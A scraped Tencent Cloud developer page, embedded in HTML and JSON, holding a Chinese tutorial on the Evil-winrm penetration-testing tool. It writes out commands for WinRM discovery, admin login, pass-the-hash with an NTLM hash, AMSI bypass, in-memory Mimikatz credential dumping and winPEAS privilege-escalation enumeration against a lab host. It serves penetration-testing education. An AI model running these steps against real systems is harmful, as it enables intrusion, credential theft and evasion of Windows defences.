18.8761H11V20.8761H4V14.0001H6V17.543L9.54291 14.0001L10.9571 15.4143L7.4953 18.8761Z"></path><path d="M16.5047 18.8761H13V20.8761H20V14.0001H18V17.543L14.4571 14.0001L13.0429 15.4143L16.5047 18.8761Z"></path></svg></span></span></button><button class="cdc-icon-btn cdc-suspend-pill__item recommend cdc-icon-btn--text" track-click="{&quot;areaId&quot;:106019,&quot;recPolicyId&quot;:1002,&quot;elementId&quot;:2}" track-exposure="{&quot;areaId&quot;:106019,&quot;recPolicyId&quot;:1002,&quot;elementId&quot;:2}"><span class="cdc-svg-icon-con"><span class="cdc-svg-icon" style="width:24px;height:24px"><svg width="24" height="24" viewBox="0 0 24 24" fill="currentcolor" xmlns="http://www.w3.org/2000/svg"><path d="M5 8H10V10H5V8Z"></path><path d="M10 12H5V14H10V12Z"></path><path d="M14 8H19V10H14V8Z"></path><path d="M19 12H14V14H19V12Z"></path><path fill-rule="evenodd" clip-rule="evenodd" d="M11 20.608L9.57047 20.1996C8.83303 19.9889 8.05701 19.9506 7.30243 20.0878L4.35777 20.6232C3.13009 20.8464 2 19.9033 2 18.6555V5.2669C2 4.2325 2.78877 3.36877 3.81893 3.27512L6.52892 3.02875C7.95704 2.89892 9.39058 3.21084 10.6356 3.9223L12 4.70194L13.3644 3.9223C14.6094 3.21084 16.043 2.89892 17.4711 3.02875L20.1811 3.27512C21.2112 3.36877 22 4.2325 22 5.2669V18.6555C22 19.9033 20.8699 20.8464 19.6422 20.6232L16.6976 20.0878C15.943 19.9506 15.167 19.9889 14.4295 20.1996L13 20.608L12.5 20.8535L12 20.8937L11.5 20.8535L11 20.608ZM6.70999 5.02054C7.73007 4.9278 8.75403 5.1506 9.64336 5.65879L11 6.43401V18.528L10.1199 18.2765C9.0875 17.9815 8.00107 17.928 6.94466 18.1201L4 18.6555V5.2669L6.70999 5.02054ZM13 18.528L13.8801 18.2765C14.9125 17.9815 15.9989 17.928 17.0553 18.1201L20 18.6555V5.2669L17.29 5.02054C16.2699 4.9278 15.246 5.1506 14.3566 5.65879L13 6.43401V18.528Z"></path></svg></span></span><span class="cdc-suspend-pill__item-text">推荐</span></button></div></div></div></div></div><script> if (!String.prototype.replaceAll) { String.prototype.replaceAll = function (str, newStr) { // If a regex pattern if (Object.prototype.toString.call(str).toLowerCase() === '[object regexp]') { return this.replace(str, newStr); } // If a string return this.replace(new RegExp(str, 'g'), newStr); }; } </script><script src="https://developer.qcloudimg.com/static/jquery.min.js"></script><script src="https://cloud.tencent.com/qccomponent/login/api.js"></script><script src="https://cloudcache.tencent-cloud.com/qcloud/main/scripts/release/common/vendors/react/react.16.8.6.min.js"></script><script src="https://qccommunity-1258344699.cos.ap-guangzhou.myqcloud.com/tc_player/releasev5.1.0/libs/TXLivePlayer-1.3.5.min.js" defer=""></script><script src="https://qccommunity-1258344699.cos.ap-guangzhou.myqcloud.com/tc_player/releasev5.1.0/libs/hls.min.1.1.7.js"></script><script src="https://qccommunity-1258344699.cos.ap-guangzhou.myqcloud.com/tc_player/releasev5.1.0/tcplayer.v5.1.0.min.js"></script><script id="__NEXT_DATA__" type="application/json">{"props":{"isMobile":false,"isSupportWebp":false,"currentDomain":"cloud.tencent.com","baseUrl":"https://cloud.tencent.com","reqId":"71-MWCFpCVoTQ0mrbAq7T","query":{"articleId":"2471795"},"platform":"other","env":"production","__N_SSP":true,"pageProps":{"fallback":{"#url:\"/api/article/detail\",params:#articleId:2471795,,":{"articleData":{"articleId":2471795,"codeLineNum":20,"readingTime":358,"wordsNum":1642},"articleInfo":{"articleId":2471795,"channel":4,"commentNum":0,"content":{"blocks":[{"key":"8jgoc","text":"前言介绍：","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"ee59","text":"在网络安全领域，技术的进步总是伴随着攻防两端的较量。今天，我们将深入探讨一个由Hackplayers团队开发的高效渗透工具——Evil-winrm，它专为简化Microsoft Windows环境下的渗透测试而设计。Evil-winrm与PowerShell远程协议（PSRP）协同工作，利用Windows远程管理协议（WinRM）实现远程操作。","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"1tbp8","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":0}],"data":{}},{"key":"7ts9i","text":"Evil-winrm工具以其多功能性和实用性脱颖而出，它不仅支持通过纯文本密码、SSL加密、NTLM哈希、密钥等多种方式进行远程登录，还具备文件传输、日志记录等高级功能。此外，该工具还能绕过某些安全软件在内存中加载DLL文件，动态绕过AMSI等安全机制。","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"1cn00","text":" 该工具已在Kali Linux系统中集成，但如果您想单独下载使用，则可以从其官方 git 存储库下载它。作为一款开源软件，Evil-winrm的获取十分便捷，您可以直接访问GitHub上的项目页面进行下载。","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"bq86a","text":"https://github.com/Hackplayers/evil-winrm","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":41,"style":"UNDERLINE"}],"entityRanges":[],"data":{}},{"key":"e58vg","text":"WinRM服务的发现与利用：","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"e3jmb","text":"WinRM是微软Windows操作系统中的一种远程管理协议，基于WS-Management协议，允许远程执行命令、脚本和管理任务。通过nmap工具，我们可以检测目标主机是否开启了WinRM服务的两个默认端口5895和5896，使用如下命令：","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"eguop","text":"nmap -p 5985,5986 192.168.1.19\n","type":"code-block","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{"syntax":"javascript"}},{"key":"9o2f7","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":1}],"data":{}},{"key":"3rbqb","text":"一旦确认目标主机的WinRM服务已开启，我们便可以使用Evil-winrm进行远程管理。","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"5hmlp","text":"多种登录方式：","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"5g228","text":"Evil-winrm支持多种登录方式，包括使用纯文本密码登录、启动SSL加密的登录会话、利用NTLM哈希进行传递哈希攻击等。","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"2vui7","text":"纯文本密码登录：","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":8,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"drt0g","text":"如果您已经通过合法的枚举方式获取了目标主机的纯文本密码，您可以使用Evil-winrm工具进行远程会话。以下是如何使用Evil-winrm进行远程会话的示例命令：","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"al54","text":"evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987\n","type":"code-block","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{"syntax":"javascript"}},{"key":"67mme","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":2}],"data":{}},{"key":"dnacs","text":"可以看到, 已经成功建立起远程会话。","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"eg00q","text":"启动SSL加密的登录:","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":11,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"950mq","text":"为了增强远程会话的安全性，可以使用Evil-winrm工具通过SSL加密WinRM连接。当启用SSL功能时，所有传输的数据都将被加密，这有助于保护会话免受中间人攻击和其他网络层面的威胁。","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"d5e4a","text":"evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S\n","type":"code-block","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{"syntax":"javascript"}},{"key":"dcho","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":3}],"data":{}},{"key":"btvlm","text":"NTLM哈希登录：","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":9,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"6v3t7","text":"可以通过利用evil-winrm工具执行传递哈希攻击（Pass-The-Hash）来建立PowerShell会话。这种攻击方式允许攻击者使用NTLM哈希值而不是纯文本密码进行远程登录。以下是执行此类攻击的完整命令示例：","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"chfkb","text":"evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38\n","type":"code-block","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{"syntax":"javascript"}},{"key":"4hpgs","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":4}],"data":{}},{"key":"dm31t","text":"执行PowerShell脚本：","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"26t4h","text":"Evil-winrm还允许用户直接从本地机器加载PowerShell脚本到目标机器的内存中，同时提供绕过AMSI的功能。","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"binta","text":"脚本获取来源:","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"fc4hm","text":"https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":85,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"b37bh","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":5}],"data":{}},{"key":"9jegf","text":"使用以下命令可以加载并执行Mimikatz脚本：","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"7s6g1","text":"","type":"code-block","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{"syntax":"javascript"}},{"key":"5m0qs","text":"evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell\nBypass-4MSI\nInvoke-Mimikatz.ps1\n","type":"code-block","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{"syntax":"javascript"}},{"key":"436s5","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":6}],"data":{}},{"key":"a1ked","text":"日志存储与可执行文件运行：","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"8h9ls","text":"Evil-winrm还提供了日志存储功能，方便在CTF比赛或渗透测试中保存操作记录。同时，它还能在PowerShell会话中运行exe可执行文件，为攻击者提供了极大的便利。","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"4ammt","text":"日志存储：","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":5,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"dtggg","text":"允许通过 -l 标志将所有日志保存到本地机器","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":5,"length":2,"style":"CODE"}],"entityRanges":[],"data":{}},{"key":"5kmbm","text":"evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l\n","type":"code-block","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{"syntax":"javascript"}},{"key":"6c403","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":7}],"data":{}},{"key":"567vo","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":8}],"data":{}},{"key":"do05p","text":"运行可执行文件：\n","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":8,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"3dsa9","text":"提供了一个存储在本地机器中的 WinPEAS.exe 可执行文件的路径","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":15,"length":11,"style":"CODE"}],"entityRanges":[],"data":{}},{"key":"8vedf","text":"evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc\nBypass-4MSI\nmenu\nInvoke-Binary /opt/privsc/winPEASx64.exe\n","type":"code-block","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{"syntax":"javascript"}},{"key":"30ekb","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":9}],"data":{}},{"key":"2pm3b","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":10}],"data":{}},{"key":"4kgpt","text":"服务枚举与文件传输：","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"b5bt0","text":"Evil-winrm能够列出目标系统中运行的所有服务，帮助攻击者识别未被其他工具检测到的服务。此外，它还支持文件的上传和下载，简化了在目标系统和攻击者机器之间的文件传输过程。","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"9d5ka","text":"服务枚举：","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":5,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"fqnmv","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":11}],"data":{}},{"key":"8dtfi","text":"文件传输：","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":5,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"b5lf0","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":12}],"data":{}},{"key":"fir8u","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":13}],"data":{}},{"key":"840du","text":"总结","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"4cm2l","text":"Evil-winrm是一个功能强大的渗透测试工具，它通过多种登录方式、脚本执行、日志存储等功能，极大地简化了渗透测试的过程。随着网络安全威胁的不断演变，工具如Evil-winrm在安全专家和渗透测试人员的工具箱中扮演着越来越重要的角色。","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{"0":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/ba9e7899724c2581f2d66168687481c4.png","imageAlt":"","name":"","blockWidth":1080,"blockHeight":558}},"1":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/782139bb357672ee1d85e120caf3c50a.png","imageAlt":"","name":"","blockWidth":573,"blockHeight":205}},"2":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/261b558d4bb2028ad13ac47927d178d0.png","imageAlt":"","name":"","blockWidth":622,"blockHeight":223}},"3":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/7fc49f928a8e4c7f9a4835937cc5f927.png","imageAlt":"","name":"","blockWidth":628,"blockHeight":269}},"4":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/cb7a6515397d2c688d637854b3872afc.png","imageAlt":"","name":"","blockWidth":635,"blockHeight":188}},"5":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/530dde0b0aab03a08634ba06ec79abba.png","imageAlt":"","name":"","blockWidth":628,"blockHeight":288}},"6":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/fcfa74083d5efbc77190adc1704cc167.png","imageAlt":"","name":"","blockWidth":672,"blockHeight":687}},"7":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/90887e058d889ab20026c22a8154457a.png","imageAlt":"","name":"","blockWidth":661,"blockHeight":366}},"8":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/1a8bf1f749f5242188b038372bba6f73.png","imageAlt":"","name":"","blockWidth":670,"blockHeight":228}},"9":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/ead10960b12a27fa34a92e786c48e70d.png","imageAlt":"","name":"","blockWidth":673,"blockHeight":689}},"10":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/c0ead9f3ddd599b1cd45c0ef0d035f25.png","imageAlt":"","name":"","blockWidth":674,"blockHeight":634}},"11":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/b3d5b3731a4e46b9b57aa183833eb7e8.png","imageAlt":"","name":"","blockWidth":670,"blockHeight":459}},"12":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/33e62467913e729617b97daf99c55906.png","imageAlt":"","name":"","blockWidth":634,"blockHeight":322}},"13":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/f50957d563ecdca3f5dcd4ee01eee0c2.png","imageAlt":"","name":"","blockWidth":632,"blockHeight":268}}}},"createTime":1732703166,"ext":{"closeTextLink":0,"comment_ban":0,"description":"","focusRead":0},"favNum":0,"isOriginal":0,"likeNum":0,"pic":"https://developer.qcloudimg.com/http-save/yehe-2017757/6d4e0b72a10e801419c6d7a931e9c1de.jpg","plain":"前言介绍：\n在网络安全领域，技术的进步总是伴随着攻防两端的较量。今天，我们将深入探讨一个由Hackplayers团队开发的高效渗透工具——Evil-winrm，它专为简化Microsoft Windows环境下的渗透测试而设计。Evil-winrm与PowerShell远程协议（PSRP）协同工作，利用Windows远程管理协议（WinRM）实现远程操作。\nEvil-winrm工具以其多功能性和实用性脱颖而出，它不仅支持通过纯文本密码、SSL加密、NTLM哈希、密钥等多种方式进行远程登录，还具备文件传输、日志记录等高级功能。此外，该工具还能绕过某些安全软件在内存中加载DLL文件，动态绕过AMSI等安全机制。\n 该工具已在Kali Linux系统中集成，但如果您想单独下载使用，则可以从其官方 git 存储库下载它。作为一款开源软件，Evil-winrm的获取十分便捷，您可以直接访问GitHub上的项目页面进行下载。\nhttps://github.com/Hackplayers/evil-winrm\nWinRM服务的发现与利用：\nWinRM是微软Windows操作系统中的一种远程管理协议，基于WS-Management协议，允许远程执行命令、脚本和管理任务。通过nmap工具，我们可以检测目标主机是否开启了WinRM服务的两个默认端口5895和5896，使用如下命令：\nnmap -p 5985,5986 192.168.1.19\n\n一旦确认目标主机的WinRM服务已开启，我们便可以使用Evil-winrm进行远程管理。\n多种登录方式：\nEvil-winrm支持多种登录方式，包括使用纯文本密码登录、启动SSL加密的登录会话、利用NTLM哈希进行传递哈希攻击等。\n纯文本密码登录：\n如果您已经通过合法的枚举方式获取了目标主机的纯文本密码，您可以使用Evil-winrm工具进行远程会话。以下是如何使用Evil-winrm进行远程会话的示例命令：\nevil-winrm -i 192.168.1.19 -u administrator -p Ignite@987\n\n可以看到, 已经成功建立起远程会话。\n启动SSL加密的登录:\n为了增强远程会话的安全性，可以使用Evil-winrm工具通过SSL加密WinRM连接。当启用SSL功能时，所有传输的数据都将被加密，这有助于保护会话免受中间人攻击和其他网络层面的威胁。\nevil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S\n\nNTLM哈希登录：\n可以通过利用evil-winrm工具执行传递哈希攻击（Pass-The-Hash）来建立PowerShell会话。这种攻击方式允许攻击者使用NTLM哈希值而不是纯文本密码进行远程登录。以下是执行此类攻击的完整命令示例：\nevil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38\n\n执行PowerShell脚本：\nEvil-winrm还允许用户直接从本地机器加载PowerShell脚本到目标机器的内存中，同时提供绕过AMSI的功能。\n脚本获取来源:\nhttps://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1\n使用以下命令可以加载并执行Mimikatz脚本：\nevil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell\nBypass-4MSI\nInvoke-Mimikatz.ps1\n\n日志存储与可执行文件运行：\nEvil-winrm还提供了日志存储功能，方便在CTF比赛或渗透测试中保存操作记录。同时，它还能在PowerShell会话中运行exe可执行文件，为攻击者提供了极大的便利。\n日志存储：\n允许通过 -l 标志将所有日志保存到本地机器\nevil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l\n\n运行可执行文件：\n\n提供了一个存储在本地机器中的 WinPEAS.exe 可执行文件的路径\nevil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc\nBypass-4MSI\nmenu\nInvoke-Binary /opt/privsc/winPEASx64.exe\n\n服务枚举与文件传输：\nEvil-winrm能够列出目标系统中运行的所有服务，帮助攻击者识别未被其他工具检测到的服务。此外，它还支持文件的上传和下载，简化了在目标系统和攻击者机器之间的文件传输过程。\n服务枚举：\n文件传输：\n总结\nEvil-winrm是一个功能强大的渗透测试工具，它通过多种登录方式、脚本执行、日志存储等功能，极大地简化了渗透测试的过程。随着网络安全威胁的不断演变，工具如Evil-winrm在安全专家和渗透测试人员的工具箱中扮演着越来越重要的角色。","showReadNum":171,"sourceDetail":null,"sourceType":99,"status":2,"summary":"在网络安全领域，技术的进步总是伴随着攻防两端的较量。今天，我们将深入探讨一个由Hackplayers团队开发的高效渗透工具——Evil-winrm，它专为简化Microsoft Windows环境下的渗透测试而设计。Evil-winrm与PowerShell远程协议（PSRP）协同工作，利用Windows远程管理协议（WinRM）实现远程操作。","tagIds":[16545,17276,17287,17592,10672],"title":"【Tools】黑客渗透超级管理终端Evil-winrm","uid":2017757,"updateTime":1732703166,"userSummary":"在网络安全领域，技术的进步总是伴随着攻防两端的较量。今天，我们将深入探讨一个由Hackplayers团队开发的高效渗透工具——Evil-winrm，它专为简化Microsoft Windows环境下的渗透测试而设计。Evil-winrm与PowerShell远程协议（PSRP）协同工作，利用Windows远程管理协议（WinRM）实现远程操作。","userUpdateTime":1732703166,"isNewArticle":false},"authorInfo":{"articleNum":0,"avatarUrl":"https://developer.qcloudimg.com/http-save/10011/f7e7056991e2e0aebf44c32cfa9b462a.jpg","company":"某金融公司","introduce":"","isProfessionVerified":0,"nickname":"释然IT杂谈","privilege":1,"title":"运维","uid":2017757},"authorType":{"isBlogMoveAuthor":1,"isCoCreator":0,"isInternalAuthor":0,"isOriginalAuthor":1},"classify":[{"id":9,"name":"安全"}],"columnInfo":{"columnAvatar":"https://imgcache.qq.com/qcloud/developer/images/release/column-icons/6.png","columnDesc":"","columnId":86963,"columnName":"释然IT杂谈","createTime":1588960313,"createUid":2017757,"memberNum":1,"showArticleNum":266,"showConcernNum":52},"columnList":[{"columnAvatar":"https://imgcache.qq.com/qcloud/developer/images/release/column-icons/6.png","columnDesc":"","columnId":86963,"columnName":"释然IT杂谈","createTime":1588960313,"createUid":2017757,"memberNum":1,"showArticleNum":266,"showConcernNum":52}],"editTime":0,"isTencent":false,"longtailTags":[],"publishTime":1732703166,"sourceDetail":{"blogType":1,"blogUrl":"","channelSource":"wechat","originalTime":"2024-11-26","sourceAuthor":"释然IT杂谈","sourceLink":"https://mp.weixin.qq.com/s?__biz=MzIxMTEyOTM2Ng==\u0026mid=2247504177\u0026idx=1\u0026sn=e2710e8f9ba0b1f3bae9e72d6ebf8dc9\u0026chksm=97589448a02f1d5e3216383a46f5202ae71fbf3efc1b86369bf34d29b4f618eda861d8c7d8f8#rd","wechatNickName":"释然IT杂谈","wechatUserName":"gh_ad4551519762"},"tags":[{"categoryId":99,"createTime":"2023/03/14 11:34:42","groupId":0,"groupName":"","tagId":16545,"tagName":"tools"},{"categoryId":99,"createTime":"2023/03/14 11:34:55","groupId":0,"groupName":"","tagId":17276,"tagName":"工具"},{"categoryId":99,"createTime":"2023/03/14 11:34:55","groupId":0,"groupName":"","tagId":17287,"tagName":"管理"},{"categoryId":99,"createTime":"2023/03/14 11:35:00","groupId":0,"groupName":"","tagId":17592,"tagName":"终端"},{"categoryId":3,"createTime":"2018/09/06 18:30:02","groupId":10133,"groupName":"开发技术","tagId":10672,"tagName":"黑客"}],"textLink":[{"ext":{"categoryId":1030,"categoryName":"通用技术 - 安全","desc":"网络安全是指保护计算机网络不受未经授权的访问、攻击、破坏、篡改、窃取等威胁，确保网络系统的机密性、完整性和可用性的综合性工作。网络安全涉及计算机硬件、软件、网络设备、数据、应用程序和用户等多个方面，需要采取综合性、全面性的安全措施来确保网络安全。","kpCount":6,"name":"网络安全","pCategoryId":1002,"termId":1662},"id":58,"link":"https://cloud.tencent.com/product/ddos","sources":[1,2],"text":"网络安全"},{"ext":{"categoryId":0,"categoryName":"","desc":"","kpCount":0,"name":"","pCategoryId":0,"termId":0},"id":1109,"link":"https://cloud.tencent.com/product/wpt","sources":[1],"text":"渗透测试"},{"ext":{"categoryId":1026,"categoryName":"通用技术 - 操作系统","desc":"Kali Linux是一款基于Debian Linux的渗透测试和网络安全评估操作系统。它包含了大量的工具和资源，用于测试安全性、漏洞利用和渗透测试。Kali Linux是一款免费的开源软件，是黑客和安全专家的首选工具之一。Kali Linux还有一个强大的社区，提供了支持和更新，确保该操作系统能够保持最新的安全性和工具。","kpCount":12,"name":"Kali Linux","pCategoryId":1002,"termId":1977},"id":3674,"link":"https://cloud.tencent.com/developer/techpedia/1977","sources":[2],"text":"Kali Linux"},{"ext":{"categoryId":1026,"categoryName":"通用技术 - 操作系统","desc":"Windows是一种操作系统，由微软公司开发和维护。它是一种图形用户界面的操作系统，允许用户使用鼠标和键盘来与计算机进行交互。Windows操作系统提供了许多功能，包括文件管理、网络连接、多媒体播放、游戏等。","kpCount":11,"name":"Windows","pCategoryId":1002,"termId":1822},"id":3531,"link":"https://cloud.tencent.com/developer/techpedia/1822","sources":[2],"text":"Windows"},{"ext":{"categoryId":1025,"categoryName":"通用技术 - 运维","desc":"GitHub是一个基于web的版本控制和协作平台，主要用于存储、管理和分享开源代码和项目。它提供了基于git的版本控制功能，使得多个开发者可以在同一个代码库中协同开发，并且能够轻松地跟踪代码的变化。同时，GitHub还提供了许多其他功能，如问题跟踪、代码审查、代码片段分享、自动化测试等等，使得开发者可以更加高效地进行开发和协作。","kpCount":11,"name":"GitHub","pCategoryId":1002,"termId":1872},"id":3579,"link":"https://cloud.tencent.com/developer/techpedia/1872","sources":[2],"text":"GitHub"},{"ext":{"categoryId":1026,"categoryName":"通用技术 - 操作系统","desc":"Linux是一种开源的操作系统，它由Linus Torvalds在1991年创建。它基于Unix操作系统，具有高度的稳定性、安全性和可靠性。Linux操作系统可以在各种计算机硬件上运行，包括个人电脑、服务器、移动设备和嵌入式系统。","kpCount":16,"name":"Linux","pCategoryId":1002,"termId":1821},"id":3530,"link":"https://cloud.tencent.com/developer/techpedia/1821","sources":[2],"text":"Linux"}]},"#url:\"/api/tag/products\",params:#tagIds:@16545,17276,17287,17592,10672,,objectType:1,objectId:2471795,,":[{"adActivity":{"id":5738,"lightSpotLabel":"HOT","pageUrl":"https://cloud.tencent.com/act/pro/Featured","priority":1,"startTime":"2023/12/12 17:58:46","title":"精选特惠 拼团嗨购"},"cnName":"网站渗透测试","desc":"网站渗透测试（Website Penetration Test，WPT）是完全模拟黑客可能使用的攻击技术和漏洞发现技术，对目标系统的安全做深入的探测，发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权，采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点，帮助管理者知道自己网络所面临的问题，同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行，我们提供黑盒、白盒、灰盒多种测试方案，更全面更深入的发现客户的潜在风险。","docURL":"","hasActivity":false,"icon":"https://main.qcloudimg.com/image/product/2105/24_24/blue.svg","introURL":"https://cloud.tencent.com/product/wpt","name":"wpt","productId":10909,"shortDesc":"模拟黑客攻击，深度挖掘系统薄弱环节，防患于未然","tagId":10914},{"adActivity":{"id":5738,"lightSpotLabel":"HOT","pageUrl":"https://cloud.tencent.com/act/pro/Featured","priority":1,"startTime":"2023/12/12 17:58:46","title":"精选特惠 拼团嗨购"},"cnName":"DDoS 防护","desc":"DDoS 防护（Anti-DDoS）具有全面、高效、专业的 DDoS 防护能力，为企业组织提供 DDoS 高防包、DDoS 高防 IP 等多种 DDoS 解决方案，应对 DDoS 攻击问题。通过充足、优质的 DDoS 防护资源，结合持续进化的“自研+AI 智能识别”清洗算法，保障用户业务的稳定、安全运行。防护场景覆盖游戏、互联网、视频、金融、政府等行业。","docURL":"https://cloud.tencent.com/document/product/297","hasActivity":false,"icon":"https://main.qcloudimg.com/image/product/2075/32_32/blue.svg","introURL":"https://cloud.tencent.com/product/ddos","name":"ddos","productId":11061,"shortDesc":"拥有可信赖的 DDoS 